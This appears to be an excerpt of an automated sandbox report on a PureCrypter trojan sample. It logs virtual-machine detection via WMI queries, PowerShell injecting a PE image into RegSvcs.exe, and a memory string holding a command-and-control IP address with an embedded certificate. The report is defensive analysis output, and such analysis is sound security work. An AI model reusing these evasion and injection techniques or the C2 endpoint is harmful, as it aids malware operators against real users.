Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3718	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3633	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2066	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7754	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5636	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4553119445.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4573562454.0000000005719000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4573486102.000000000570A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Detected PureCrypter Trojan

Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: 92.255.57.112MIIE3jCCAsagAwIBAgIQAMyl7gKxD8R/bGWvMD10ZTANBgkqhkiG9w0BAQ0FADAQMQ4wDAYDVQQDDAVXaXB3dzAgFw0yNTAxMDMwMDU2NDNaGA85OTk5MTIzMTIzNTk1OVowEDEOMAwGA1UEAwwFV2lwd3cwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCJBHoD8dGnUp6uYikMPGLQueXv2m1Xu0heqNGi2rCJpNYbl6KI9IV6SjdkExryLeKPYYSlWJ7DpE1Q7MIziyKNfFegW9a8TG2e/iEzAEo/tpV7x9RPIcRQ/edfva5A7UXDwXtDOBoYut0QSFv09mPd+CTwBK2QBs0oGsqD/xOsjVYJJ4KX1Hd96OdFoMaocbr2/5Vd8byNHtQ+l5gorVyZF2uB8sq3Atk6wnNCp2LpnVn0fLwXr1M5IrgyIGBJlxgnApZhEK4fw9312ERy4LBTeYPi0l4CWlSHSZtthWyfNpn0jl+yg+C6nt4Ty6Ddbs9Ch014fZot/dxSYY4HaEpGNiLJ6+wDTmiTtxPBYp9q6+zAR9HhQdrby9L2vhbmIbbVrD3TR+5TcegrQ8itsRmEzDIS+F7fnCxwtWuYfDYXSl0bjIgMfCzROhBr2AAWjU8YQLZjaeJ1AdBHDnwNXYeT75YAbl8ZjtKlQVknG+OW3CwtOxSQZ+fxg4ksAiddtvvGH3e4sqkmwEhX4YOTN3F+ueUINzIPBqLNOhwezuUzyOVedqJhEspsMOG7tN+2HOjLyMUxyT46zfa4feCZap9mmcxW1nTePXW5pSlWxOa4+PG+BOr0Cc7bPmTwBSWNnKy1dDVQyCuazmo9qJ7F9JaEW3tYtqjJheI8dPTlNcCbIwIDAQABozIwMDAdBgNVHQ4EFgQU6wPCBOLkp1AKy1BgfeO7G7mU/9wwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAIOkGO4X8MYgfkdBrYh0KLj11P8ETDbp9EokYcLU3xGh3qtdYRakKdtz4V2GwCWauK0sbOzIWqm+0nuF1BFG4Ff/n90e8zQy4Dx1HkrG+A/4NRiq/1ZRcUhXcEOCbCQlhREZtin6BwTno5ypVaqtWI7ip+OZZruNvVLAQaR2wPKe9W8M+ACn8ipeXGmtow9rqpnUM0KCgT36+TkDyiz6RqBxWjiyDWoodnkxuqrffZdMrob7FxYxWlXK9ODtx/88FBHz0wabvGFkHlWNAUr3BTBMyOyZZTOn08RLKDw90Uj/e9vQf9AutujdJtyhuXL/qbBVOa0bWHIbEdai5rFwo17XMBQhcVDD7cKi4UxpxdviOT3t0ALlE8Zw/NDNz/a0u+bQL3rP7+KCy4X9FidO6umTIoWRv8OSotXX+TsJf+HtG9/nBxEnBF0URXzzCTb20vTtrqfr0zeuZIZN/B0zU68bFS0FycEJVD1y47yhsBThhEVvUMWIYu/RlEENmiT5KYoHD6mcNEXvOUXYFHSiNhNP3ocZAAEirBiZWk2i/mwwd1iL6baDKt+7btwWjUUvqDtnZThWLXjsKkvk84tfiEwVBzZiv3tHotXZB6Y+ILVrE9HdE2I0zyhWIrVRE+tNQxTwb49fLxIF+SoF4K3lYK5Gnp4JYord3Uhmhmm9mZGo="Default:BAPPDATAJ3e74489724f9

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B3A008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTecqp
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTecqP
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002E16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh{cqx
Source: RegSvcs.exe, 00000003.00000002.4558584705.000000000310F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.000000000306F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.00000000030BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTecqD
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTecq
Source: RegSvcs.exe, 00000003.00000002.4558584705.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTecq`
Source: RegSvcs.exe, 00000003.00000002.4558584705.000000000301F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTecq@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior

